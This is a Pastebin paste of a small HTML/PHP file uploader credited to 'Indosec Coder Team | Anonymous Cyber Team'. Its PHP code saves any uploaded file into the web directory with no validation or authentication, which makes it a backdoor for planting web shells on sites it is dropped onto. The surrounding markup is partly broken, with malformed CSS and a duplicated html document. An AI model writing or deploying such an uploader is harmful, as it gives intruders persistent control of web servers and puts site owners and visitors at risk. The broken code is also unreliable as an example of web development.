Advertisement
Ar4thnr

uplouder with HTML5

Apr 7th, 2020
656
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
HTML 5 1.85 KB | None | 0 0
  1. <!DOCTYPE htmL>
  2.  <html lang="en">
  3.  <title>Uplouder Mr.Froggy </title>
  4.  <head>
  5.   <style type="text/css">
  6.     html,body {
  7.         background: url(https://i.pinimg.com/originals/0c/3d/10/0c3d10ad4d3ec07025f5d05c73780286.jpg);
  8.             -webkit-background-size: 50% 50%;
  9.             -o-background-size: 25% 25%;
  10.             background-size: 25% 25%;
  11.  
  12.     }
  13.     .wrap{
  14.         background: rgb(226, 0, 224);
  15.         column-width: 50%;
  16.         margin-top: 50%;
  17.         margin-bottom: 50%;
  18.         margin: 10px auto:;
  19.         }$breadcrumb-divide: quate(">")
  20.                 /*header*/
  21.                 .wrap .header{
  22.                     background: red;
  23.                     /*height 25px;*/
  24.                     padding: 5px 5px 5px;
  25.                 }
  26. /*end header*/
  27. .wrap .menu ul li{
  28.     padding: 0;
  29.     margin: 0;
  30.     margin-top: 10;
  31.     background: red;
  32.     overflow: hidden;
  33.  
  34.     }
  35. }
  36. h1 {
  37.     display: block;
  38.     font-size: 2em;
  39.     margin-block-start: 0.67em;
  40.     margin-block-end: 0.67em;
  41.     margin-inline-start: 0px;
  42.     margin-inline-end: 0px;
  43.     font-weight: bold;
  44. }
  45.  
  46. </style>
  47. </head>
  48. <body>
  49.     <!DOCTYPE html>
  50. <html>
  51. <head>
  52.   <title>Upload your files</title>
  53. </head>
  54. <body>
  55.     <center>
  56.    
  57.   <h1 style="color:red;">uploud file</h1>
  58.   <?php echo 'Uploader<br>';echo '<br>';echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';if( $_POST['_upl'] == "Upload" ) {if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload !!!</b><br><br>'; }else { echo '<b>Upload !!!</b><br><br>'; }}?>
  59.  </center>
  60.  
  61.     <h2><p><font color="red" size="4pt">uplouder ini dibuat dengan otak dek kalo mau rubah ubah mikir ya dek:</font><marquee width="70%" style="color:red;"><font size="3pt">Indosec Coder Team | |Anonymous Cyber Team / By Froggy</font></marquee></p></h2>
  62.   </div>
  63. </body>
  64. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement